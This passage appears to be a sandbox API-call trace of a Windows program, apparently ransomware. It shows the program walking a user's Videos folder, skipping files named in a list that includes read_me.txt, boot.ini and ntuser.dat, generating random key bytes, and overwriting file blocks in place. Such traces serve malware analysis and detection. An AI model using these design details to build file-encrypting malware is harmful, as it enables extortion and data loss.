lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab3d97a0, ftCreationTime.dwHighDateTime=0x1d4d411, ftLastAccessTime.dwLowDateTime=0x87bb6fb0, ftLastAccessTime.dwHighDateTime=0x1d4d258, ftLastWriteTime.dwLowDateTime=0x87bb6fb0, ftLastWriteTime.dwHighDateTime=0x1d4d258, nFileSizeHigh=0x0, nFileSizeLow=0x16e69, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="2AssQPXs63.swf", cAlternateFileName="2ASSQP~1.SWF")) returned 1 [0078.580] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\2AssQPXs63.swf") returned 70 [0078.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\2AssQPXs63.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\2assqpxs63.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x798 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="read_me.txt") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="autoexec.bat") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="desktop.ini") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="autorun.inf") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="ntuser.dat") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="iconcache.db") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="bootsect.bak") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="boot.ini") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="ntuser.dat.log") returned 0x0 [0078.581] StrStrW (lpFirst="2assqpxs63.swf", lpSrch="thumbs.db") returned 0x0 [0078.581] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 190 [0078.581] QueueUserWorkItem (Function=0x404e00, Context=0x798, Flags=0x0) returned 1 [0078.581] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e85b60, ftCreationTime.dwHighDateTime=0x1d4cf30, ftLastAccessTime.dwLowDateTime=0x2b0cdc30, ftLastAccessTime.dwHighDateTime=0x1d4cfcf, ftLastWriteTime.dwLowDateTime=0x2b0cdc30, ftLastWriteTime.dwHighDateTime=0x1d4cfcf, nFileSizeHigh=0x0, nFileSizeLow=0x18b2, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="fzYLz2.avi", cAlternateFileName="")) returned 1 [0078.581] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\fzYLz2.avi") returned 66 [0078.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\fzYLz2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\fzylz2.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x784 [0078.581] StrStrW (lpFirst="fzylz2.avi", lpSrch="read_me.txt") returned 0x0 [0078.581] StrStrW (lpFirst="fzylz2.avi", lpSrch="autoexec.bat") returned 0x0 [0078.581] StrStrW (lpFirst="fzylz2.avi", lpSrch="desktop.ini") returned 0x0 [0078.581] StrStrW (lpFirst="fzylz2.avi", lpSrch="autorun.inf") returned 0x0 [0078.581] StrStrW (lpFirst="fzylz2.avi", lpSrch="ntuser.dat") returned 0x0 [0078.581] StrStrW (lpFirst="fzylz2.avi", lpSrch="iconcache.db") returned 0x0 [0078.581] StrStrW (lpFirst="fzylz2.avi", lpSrch="bootsect.bak") returned 0x0 [0078.582] StrStrW (lpFirst="fzylz2.avi", lpSrch="boot.ini") returned 0x0 [0078.582] StrStrW (lpFirst="fzylz2.avi", lpSrch="ntuser.dat.log") returned 0x0 [0078.582] StrStrW (lpFirst="fzylz2.avi", lpSrch="thumbs.db") returned 0x0 [0078.582] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 191 [0078.582] QueueUserWorkItem (Function=0x404e00, Context=0x784, Flags=0x0) returned 1 [0078.582] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8d84e0, ftCreationTime.dwHighDateTime=0x1d4d4e3, ftLastAccessTime.dwLowDateTime=0xc69f3280, ftLastAccessTime.dwHighDateTime=0x1d4caaa, ftLastWriteTime.dwLowDateTime=0xc69f3280, ftLastWriteTime.dwHighDateTime=0x1d4caaa, nFileSizeHigh=0x0, nFileSizeLow=0x18bff, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Nj6U RSGNSkWm7K L4 -.mkv", cAlternateFileName="NJ6URS~1.MKV")) returned 1 [0078.582] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\Nj6U RSGNSkWm7K L4 -.mkv") returned 80 [0078.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\Nj6U RSGNSkWm7K L4 -.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\nj6u rsgnskwm7k l4 -.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x790 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="read_me.txt") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="autoexec.bat") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="desktop.ini") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="autorun.inf") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="ntuser.dat") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="iconcache.db") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="bootsect.bak") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="boot.ini") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0078.582] StrStrW (lpFirst="nj6u rsgnskwm7k l4 -.mkv", lpSrch="thumbs.db") returned 0x0 [0078.582] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 192 [0078.582] QueueUserWorkItem (Function=0x404e00, Context=0x790, Flags=0x0) returned 1 [0078.582] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cc0bce0, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0xd4d08b60, ftLastAccessTime.dwHighDateTime=0x1d4cb31, ftLastWriteTime.dwLowDateTime=0xd4d08b60, ftLastWriteTime.dwHighDateTime=0x1d4cb31, nFileSizeHigh=0x0, nFileSizeLow=0x1072, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="oAC5gF9FT_zMLA46oG.swf", cAlternateFileName="OAC5GF~1.SWF")) returned 1 [0078.582] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\oAC5gF9FT_zMLA46oG.swf") returned 78 [0078.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\oAC5gF9FT_zMLA46oG.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\oac5gf9ft_zmla46og.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74c [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="read_me.txt") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="autoexec.bat") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="desktop.ini") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="autorun.inf") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="ntuser.dat") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="iconcache.db") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="bootsect.bak") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="boot.ini") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="ntuser.dat.log") returned 0x0 [0078.583] StrStrW (lpFirst="oac5gf9ft_zmla46og.swf", lpSrch="thumbs.db") returned 0x0 [0078.583] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 193 [0078.583] QueueUserWorkItem (Function=0x404e00, Context=0x74c, Flags=0x0) returned 1 [0078.583] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24d57140, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24d57140, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24d57140, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0078.583] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\read_me.txt") returned 67 [0078.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0078.583] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0078.583] CloseHandle (hObject=0x778) returned 1 [0078.583] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d40ee20, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xda4a8fb0, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0xda4a8fb0, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x12e35, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="YePQg6Yawc.mkv", cAlternateFileName="YEPQG6~1.MKV")) returned 1 [0078.583] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\YePQg6Yawc.mkv") returned 70 [0078.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\YePQg6Yawc.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\yepqg6yawc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="read_me.txt") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="autoexec.bat") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="desktop.ini") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="autorun.inf") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="ntuser.dat") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="iconcache.db") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="bootsect.bak") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="boot.ini") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0078.584] StrStrW (lpFirst="yepqg6yawc.mkv", lpSrch="thumbs.db") returned 0x0 [0078.584] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 194 [0078.584] QueueUserWorkItem (Function=0x404e00, Context=0x778, Flags=0x0) returned 1 [0078.584] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d40ee20, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xda4a8fb0, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0xda4a8fb0, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x12e35, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="yepqg6yawc.mkv", cAlternateFileName="YEPQG6~1.MKV")) returned 0 [0078.584] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0078.584] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\read_me.txt") returned 67 [0078.584] GetProcessHeap () returned 0x4f10000 [0078.584] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0078.584] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 89 [0078.584] GetProcessHeap () returned 0x4f10000 [0078.584] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e01110 | out: hHeap=0x4f10000) returned 1 [0078.591] SetFilePointerEx (in: hFile=0x808, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.591] ReadFile (in: hFile=0x808, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0078.591] SetFilePointerEx (in: hFile=0x808, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.591] GetProcessHeap () returned 0x4f10000 [0078.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.591] GetProcessHeap () returned 0x4f10000 [0078.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0078.591] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0078.591] GetProcessHeap () returned 0x4f10000 [0078.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0078.591] ReadFile (in: hFile=0x808, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.686] SetFilePointerEx (in: hFile=0x808, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.686] WriteFile (in: hFile=0x808, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.687] GetProcessHeap () returned 0x4f10000 [0078.687] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.688] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.688] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.689] GetProcessHeap () returned 0x4f10000 [0078.689] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.690] GetProcessHeap () returned 0x4f10000 [0078.690] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.691] GetProcessHeap () returned 